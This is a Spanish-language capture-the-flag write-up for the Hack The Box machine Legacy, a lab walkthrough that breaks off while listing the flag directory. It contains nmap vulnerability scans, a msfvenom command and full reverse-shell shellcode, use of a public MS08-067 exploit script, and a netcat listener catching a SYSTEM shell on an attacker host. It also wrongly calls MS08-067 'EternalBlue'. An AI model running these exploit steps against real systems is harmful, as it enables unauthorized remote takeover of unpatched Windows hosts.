En este post veremos como explotar la máquina Legacy usando el EternalBlue CVE-2008-4250. Esta máuqina tiene parecido a la máquina anterior Blue, pero tocaremos algún otro concepto como la creación de un shellcode con msfvenom y evitando el uso de zzz_exploit.py.
Reconocimiento
Escaneo De Puertos
Escaneamos con nmap los puertos abiertos en la máquina Legacy:
Vemos que el SO que corre en la máquina es Windows XP en este momento ya tenemos que pensar en el famoso EternalBlue o en alguna de sus variantes.
Podemos comprobar con nmap si el equipo tiene alguna vulnerabilidad con el siguiente parámetro de nmap --script vuln, en este caso lo más seguro es que nos reporte vulnerabilidades para el smb como el EternalBlue.
❯ nmap --script vuln -p 135,139,44510.10.10.4 -oN Vulnschecker StartingNmap7.92 ( https://nmap.org ) at 2022-08-11 05:05 CEST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 10.10.10.4 Host is up (0.044s latency). PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds
Host script results: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143https://www.hackthebox.com/storage/avatars/60dc190c4c015cfe3a3aef9b5afca254.png | Riskfactor:HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosuredate:2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ |_smb-vuln-ms10-054: false | smb-vuln-ms08-067: | VULNERABLE: | MicrosoftWindows system vulnerable to remote code execution (MS08-067) | State: LIKELY VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | VistaGoldandSP1, Server2008, and7Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
Vemos que es vulnerable y tenemos dos opciones smb-vuln-ms17-010 & smb-vuln-ms08-067. Nos decantaremos por la última, ya que en la máquina Blue usamos la primera.
Explotación Con Eternalblue
Repositorio
Tenemos un repositorio de github donde se nos facilita un script en python para explotar esta vulnerabilidad CVE-2008-4250.
❯ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.5LPORT=1234EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows Found11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai failed with A valid opcode permutation could not be found. Attempting to encode payload with 1 iterations of generic/none generic/none failed with Encoding failed due to a bad character (index=3, char=0x00) Attempting to encode payload with 1 iterations of x86/call4_dword_xor x86/call4_dword_xor succeeded with size 348 (iteration=0) x86/call4_dword_xor chosen with final size 348 Payloadsize:348 bytes Final size of c file:1488 bytes unsigned char buf[] = "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" "\x6f\x88\xb5\xee\x83\xee\xfc\xe2\xf4\x93\x60\x37\xee\x6f\x88" "\xd5\x67\x8a\xb9\x75\x8a\xe4\xd8\x85\x65\x3d\x84\x3e\xbc\x7b" "\x03\xc7\xc6\x60\x3f\xff\xc8\x5e\x77\x19\xd2\x0e\xf4\xb7\xc2" "\x4f\x49\x7a\xe3\x6e\x4f\x57\x1c\x3d\xdf\x3e\xbc\x7f\x03\xff" "\xd2\xe4\xc4\xa4\x96\x8c\xc0\xb4\x3f\x3e\x03\xec\xce\x6e\x5b" "\x3e\xa7\x77\x6b\x8f\xa7\xe4\xbc\x3e\xef\xb9\xb9\x4a\x42\xae" "\x47\xb8\xef\xa8\xb0\x55\x9b\x99\x8b\xc8\x16\x54\xf5\x91\x9b" "\x8b\xd0\x3e\xb6\x4b\x89\x66\x88\xe4\x84\xfe\x65\x37\x94\xb4" "\x3d\xe4\x8c\x3e\xef\xbf\x01\xf1\xca\x4b\xd3\xee\x8f\x36\xd2" "\xe4\x11\x8f\xd7\xea\xb4\xe4\x9a\x5e\x63\x32\xe0\x86\xdc\x6f" "\x88\xdd\x99\x1c\xba\xea\xba\x07\xc4\xc2\xc8\x68\x77\x60\x56" "\xff\x89\xb5\xee\x46\x4c\xe1\xbe\x07\xa1\x35\x85\x6f\x77\x60" "\xbe\x3f\xd8\xe5\xae\x3f\xc8\xe5\x86\x85\x87\x6a\x0e\x90\x5d" "\x22\x84\x6a\xe0\xbf\xe4\x7f\x8d\xdd\xec\x6f\x8c\x67\x67\x89" "\xe2\xa5\xb8\x38\xe0\x2c\x4b\x1b\xe9\x4a\x3b\xea\x48\xc1\xe2" "\x90\xc6\xbd\x9b\x83\xe0\x45\x5b\xcd\xde\x4a\x3b\x07\xeb\xd8" "\x8a\x6f\x01\x56\xb9\x38\xdf\x84\x18\x05\x9a\xec\xb8\x8d\x75" "\xd3\x29\x2b\xac\x89\xef\x6e\x05\xf1\xca\x7f\x4e\xb5\xaa\x3b" "\xd8\xe3\xb8\x39\xce\xe3\xa0\x39\xde\xe6\xb8\x07\xf1\x79\xd1" "\xe9\x77\x60\x67\x8f\xc6\xe3\xa8\x90\xb8\xdd\xe6\xe8\x95\xd5" "\x11\xba\x33\x55\xf3\x45\x82\xdd\x48\xfa\x35\x28\x11\xba\xb4" "\xb3\x92\x65\x08\x4e\x0e\x1a\x8d\x0e\xa9\x7c\xfa\xda\x84\x6f" "\xdb\x4a\x3b"
Modificación Del Script
Antes de hacer uso del exploit vamos a modificar el script ms08_067_2018.py con el shellcode para definir la reverse shell.
❯ python ms08_067_2018.py ####################################################################### # Ms08-067 Exploit # This Is A Modified Verion Of Debasis Mohanty'S Code (Https://Www.Exploit-Db.Com/Exploits/7132/). # The Return Addresses And The Rop Parts Are Ported From Metasploit Module Exploit/Windows/Smb/Ms08_067_netapi # # Mod In 2018 By Andy Acer: # - Added Support For Selecting A Target Port At The Command Line. # It Seemed That Only 445 Was Previously Supported. # - Changed Library Calls To Correctly Establish A Netbios Session For Smb Transport # - Changed Shellcode Handling To Allow For Variable Length Shellcode. Just Cut And Paste # Into This Source File. #######################################################################
Example: MS08_067_2018.py 192.168.1.11445 -- for Windows XP SP0/SP1 Universal, port 445 Example: MS08_067_2018.py 192.168.1.12139 -- for Windows 2000 Universal, port 139 (445 could also be used) Example: MS08_067_2018.py 192.168.1.13445 -- for Windows 2003 SP0 Universal Example: MS08_067_2018.py 192.168.1.14445 -- for Windows 2003 SP1 English Example: MS08_067_2018.py 192.168.1.15445 -- for Windows XP SP3 French (NX) Example: MS08_067_2018.py 192.168.1.16445 -- for Windows XP SP3 English (NX) Example: MS08_067_2018.py 192.168.1.17445 -- for Windows XP SP3 English (AlwaysOn NX)
3- Ejecutamos el script, pasándole los parámetros correspondientes, en este caso el os=6 y port=445.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
❯ python2 ms08_067_2018.py 10.10.10.46445 ####################################################################### # Ms08-067 Exploit # This Is A Modified Verion Of Debasis Mohanty'S Code (Https://Www.Exploit-Db.Com/Exploits/7132/). # The Return Addresses And The Rop Parts Are Ported From Metasploit Module Exploit/Windows/Smb/Ms08_067_netapi # # Mod In 2018 By Andy Acer: # - Added Support For Selecting A Target Port At The Command Line. # It Seemed That Only 445 Was Previously Supported. # - Changed Library Calls To Correctly Establish A Netbios Session For Smb Transport # - Changed Shellcode Handling To Allow For Variable Length Shellcode. Just Cut And Paste # Into This Source File. #######################################################################
WindowsXPSP3English (NX)
[-]Initiating connection [-]connected to ncacn_np:10.10.10.4[\pipe\browser] Exploit finish
4- Comprobamos la correcta obtención de la reverse shell.
1 2 3 4 5 6 7
❯ rlwrap nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.16.5] from (UNKNOWN) [10.10.10.4] 1032 MicrosoftWindowsXP [Version5.1.2600] (C) Copyright1985-2001MicrosoftCorp.
C:\WINDOWS\system32>
5- ¡Somos nt authority\system! Perfecto ya podemos visualizar las flags.
Flags
User.Txt
1 2 3 4 5 6 7 8 9 10
Directory of C:\Documents and Settings\john\Desktop
